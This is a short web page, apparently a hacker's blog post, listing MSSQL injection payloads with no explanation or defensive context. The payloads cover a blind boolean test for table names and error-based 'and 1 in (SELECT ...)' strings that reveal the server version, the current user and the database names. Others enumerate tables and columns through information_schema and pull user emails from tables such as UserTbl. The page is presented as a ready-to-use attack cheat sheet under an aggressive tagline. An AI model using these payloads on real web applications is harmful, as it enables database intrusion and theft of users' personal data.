Mess with the best, die like the rest… 

Facebook

MSSQL Injection

———table name——–
AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype=’U'), 1, 1))) > 117

——-system info——-
and 1 in (SELECT @@SERVERNAME)–
and 1 in (SELECT @@SERVICENAME)–
and 1 in (SELECT @@version)–

——–userInfo————
and 1 in (SELECT CURRENT_USER)–
and 1 in (SELECT SYSTEM_USER)–
and 1 in (SELECT USER)–
and 1 in (SUSER_SNAME())–

———DBinfo————
and 1 in (SELECT SCHEMA_NAME(1))–
and 1 in (SELECT DB_NAME(1))–

——–tableName———-
and 1 in (select max(table_name) from information_schema.columns where table_name not in (”))–

——–columnName———–
and 1 in (select max(column_name) from information_schema.columns where table_name=’UserClub’ and column_name not in (”))–

——–diggingData——–
and 1 in (select max(UserId) from UserClub) >> won’t give any data..sooo>>
and 1 in (select max(UserEmail)+’_the_number’ from UserTbl where UserEmail not in (”))–

 

You must be logged in , to post a comment.

Home Programming MSSQL Injection
credit